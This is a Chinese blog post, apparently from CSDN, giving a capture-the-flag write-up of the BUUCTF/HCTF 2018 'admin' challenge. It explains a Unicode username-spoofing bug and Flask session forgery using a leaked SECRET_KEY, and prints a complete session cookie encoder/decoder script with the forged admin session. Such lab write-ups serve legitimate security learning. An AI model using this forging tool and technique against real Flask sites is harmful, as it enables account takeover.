BUUCTF学习笔记-admin

最新推荐文章于 2023-11-05 10:08:50 发布
最新推荐文章于 2023-11-05 10:08:50 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: CTF 文章标签: python 学习 flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Emmawas/article/details/127045507
版权

BUUCTF Admin

考点:session欺骗、flask框架

在这里插入图片描述

源代码发现两个登陆地址,一个是登陆地址,一个是注册地址

在这里插入图片描述

随意注册成功,登陆有一个remember me

在这里插入图片描述

查看源代码发现四个页面,/change 是修改密码界面

在这里插入图片描述

想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。
change功能里的源码中,提供了一个github地址。

在这里插入图片描述

https://github.com/woadsl1234/hctf_flask/

方法一 Unicode欺骗

不管是login、register还是change页面,只要是关于session['name']的操作,都先用了strlower函数将name转成小写,但是python中有自带的转小写函数lower,这里重写了一个,我们查看一下定义:

def strlower(username):
    username = nodeprep.prepare(username)
    return username

使用了 nodeprep.prepare 函数,该函数的作用是将大写转化为小写

但它同时会将 unicode 字符 转换成A,而 A 再调用一次nodeprep.prepare函数会把 A 转换成 a 也就是说我们可以使用ᴬdmin注册登录,登陆后再想办法让服务器再执行一次 nodeprep.prepare ,便可以变成admin账户,发现修改密码功能中存在

name = strlower(session['name'])

方法二 flask session伪造

查看源码,提示you are not admin,猜测需要admin登录

注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码

是一个flask 框架 ,进入routes.py,看一下注册和登录部分的源码

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

@app.route('/login', methods = ['GET', 'POST'])
def login():
    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = LoginForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        session['name'] = name
        user = User.query.filter_by(username=name).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        return redirect(url_for('index'))
    return render_template('login.html', title = 'login', form = form)

根据登录逻辑,如果是已登陆状态,再次刷新会验证session,我们可以据此伪造成admin的session绕过登录

由于 flask 是非常轻量级的 Web框架 ,其 session 存储在客户端中(可以通过HTTP请求头Cookie字段的session获取),且仅对 session 进行了签名,缺少数据防篡改实现,这便很容易存在安全漏洞。

我们可以用python脚本把flask的session解密出来,但是如果想要加密伪造生成我们自己的session的话,还需要知道flask用来签名的SECRET_KEY

全局搜索,在config.py中发现

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

猜测这个ckj123就是密钥

使用脚本对其进行解加密

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

解密的两种方式,session值通过抓包

解密:
python flask_session_manager.py decode -c -s 
# -c是flask cookie里的session值 -s参数是SECRET_KEY
加密:
python flask_session_manager.py encode -s -t 
# -s参数是SECRET_KEY -t参数是session的参照格式,也就是session解密后的格式

正确的session大概有4行

在这里插入图片描述

先进行解密,将登录成功之后的cookie复制,填在对应参数后面(参数用引号括起来),得到:

在这里插入图片描述

{'_fresh': True, '_id': b'06d501eb12c482013fed057d645510ec7771bcaf2ecd2385960e7701a2bb8d92764876eae79573f144947d25d6fef3d0604d24aa6a3ba893a7b89471f1c1c2b8', 'csrf_token': b'913c3e48f14387e21630e82553ea9dbddfd82d26', 'image': b'KOxu', 'name': 'aaa', 'user_id': '12'}

再通过修改name 为admin 加密

{'_fresh': True, '_id': b'06d501eb12c482013fed057d645510ec7771bcaf2ecd2385960e7701a2bb8d92764876eae79573f144947d25d6fef3d0604d24aa6a3ba893a7b89471f1c1c2b8', 'csrf_token': b'913c3e48f14387e21630e82553ea9dbddfd82d26', 'image': b'KOxu', 'name': 'admin', 'user_id': '12'}

在这里插入图片描述

修改包中的session进入admin账户,得到flag

在这里插入图片描述

d92764876eae79573f144947d25d6fef3d0604d24aa6a3ba893a7b89471f1c1c2b8’, ‘csrf_token’: b’913c3e48f14387e21630e82553ea9dbddfd82d26’, ‘image’: b’KOxu’, ‘name’: ‘admin’, ‘user_id’: ‘12’}

在这里插入图片描述

修改包中的session进入admin账户,得到flag
在这里插入图片描述

考点:flask框架 session修改欺骗

不会找flag的小陈
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
android学习笔记-clip.pdf
11-15
android学习笔记-clip.pdf
【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1708
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
EPLAN学习笔记-常用操作步骤
04-16
EPLAN学习笔记——常用操作步骤
JSP学习笔记-2.pdf
11-28
JSP学习笔记-2.pdf
go学习笔记-文档-文档
07-21
go学习笔记-文档
BUUCTF之 [HCTF 2018]admin
m0_62107966的博客
09-22 873
BUUCTF之 [HCTF 2018]admin-----这里的ckj123等下使用脚本时是需要用来作为参数的。刚刚以 1 用户登进去后给了个session源代码的意思是:用户如果以admin的身份登录,就直接可以拿到flag了,所以直接注册账号为admin,密码为123就成功拿到flag了。如果使用脚本的话,就需要伪造session为admin登陆的时候。使用脚本解密,脚本命名为session解密.py运行得到:得到如下:将name的值修改为admin,重新用脚本在进行加密。
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 6653
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
Buuctf admin
Dexret的博客
12-09 3273
打开该靶机,发现为一个登陆的界面 总共有三个界面,分别为主界面,login登陆界面和register注册界面 根据标题,猜测应该是让我们用admin的用户去登陆 尝试对登陆界面进行SQL注入 发现为500错误,无法对其注入 那么转换下思路,先注册一个进去看一下(admin用户无法被注册,需要用另外用户名) 发现里面有四个界面,第一个为主界面,第二个类似留言板,但是xss被完全过滤了,第三个为修改密码界面,第四个为退出 在这四个界面中,只剩下修改密码这个界面可以作为突破点 查看一下该页
BUUCTF admin
biggerpig的博客
09-24 808
buuctfweb类型admin题目
java学习笔记-Scokect.pdf
11-29
java学习笔记-Scokect.pdf
BUUCTF__[HCTF 2018]admin_题解
风过江南乱的博客
05-18 1480
一、看题 拿到题目,发现一个欢迎页面。有注册、登录功能。 首先习惯性 F12。发现提示。 提示不是 admin ,那我们尝试登录用户名 admin ,密码随便输入,提示密码错误。尝试注 册 admin ,提示账号已被注册,那么我们怎么才能用 admin 登录呢。 那先尝试随便注册一个账号登录看看有什么内容,注册用户名和密码都为1,登录。 发现有修改密码功能。 可以注册、登录、修改密码,很自然的想到二次注入。 事实上,预期解的确是二次注入,只不过有好几种非预期解法。 二、研究 这题得到flag,实
web学习 --------admin(buuctf)
weixin_44897902的博客
12-01 903
unicode欺骗,flask session伪造,条件竞争
web buuctf [HCTF 2018]admin1
weixin_44214568的博客
03-13 2810
查看首页源代码,有注释 <!-- you are not admin --> 考虑这道题很有可能是用admin或者伪造admin进行登录, 用admin进行登录,随便填写密码进不去,发现页面有注册选项,用admin注册提示已经被注册 方法一:burp爆破 进入登录界面,用户名输admin,密码随便填,抓包对密码进行爆破; 爆破之后,提示429和302,可以看一下429的response,提示的是太多请求的问题, 更改options中的选项 控制数据量,我因为正.
CTF学习笔记——[HCTF 2018]admin
Obs_cure的博客
02-15 2581
一、[HCTF 2018]admin 1.题目 2.解题步骤 这个靶场还是很完整的,注册登陆一应俱全,还有留言板。注册和登陆部分尝试了一下,大部分我认知中的注入都被过滤了。于是老老实实注册了个账号。发现里面有个留言板。这不就是师傅们经常攻击的地方吗~ 随便注入的两下没什么反应,看看源码呢~ 嗯?这个注释? 虽然能猜到这个是网站的源码,但由于没有网页的开发经验,所以很遗憾还是没看出什么门道~看WriteUp! 说实话看完之后有点被震撼到。跟着师傅们把三种做法都过一遍~ 这道题的突破口首先是github
BUUCTF [web专项23][HCTF 2018]admin
最新发布
yanglinchiji的博客
11-05 52
别人的做法是session伪造和unicode欺骗之类的。需要登录,题目提示admin,先用admin试试。发现密码是1竟然也能过(弱口令爆破)后面发现我这个算是投机取巧。右上角点击login。
BUUCTF Web [HCTF 2018]admin
网安小趴菜
10-12 540
BUUCTF Web [HCTF 2018]admin
ctfhub密码口令---弱口令
x2813488062的博客
01-30 3350
解题思路 既知道为弱口令 那用户名一般为 admin/user之类 先尝试admin 密码进行爆破 对登录页面进行抓包 先清除所有标识把抓取到的数据密码进行标识(就是需要进行爆破的位置) 加入常用密码,进行爆破 爆破后对比数据长度,发现密码为password 登录网页,拿到flag ...
buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
weixin_63231007的博客
05-03 672
[护网杯 2018]easy_tornado 1 访问页面所给的可以得到 /flag.txt flag in /fllllllllllllag 可知flag在/fllllllllllllag。 /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) render不知道是上面意思。看别人题解说:结合题目给的tornado,可以想到SSTI。 render()函数是渲染函数,进行服务器端渲染。所以能想到模板注入 [护网..
python学习笔记--皮大庆
08-14
Python学习笔记》是由皮大庆编写的一本关于Python语言学习的教材。在这本书中,作者详细介绍了Python语言的基础知识、语法规则以及常用的编程技巧。 首先,作者简要介绍了Python语言的特点和优势。他提到,Python...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值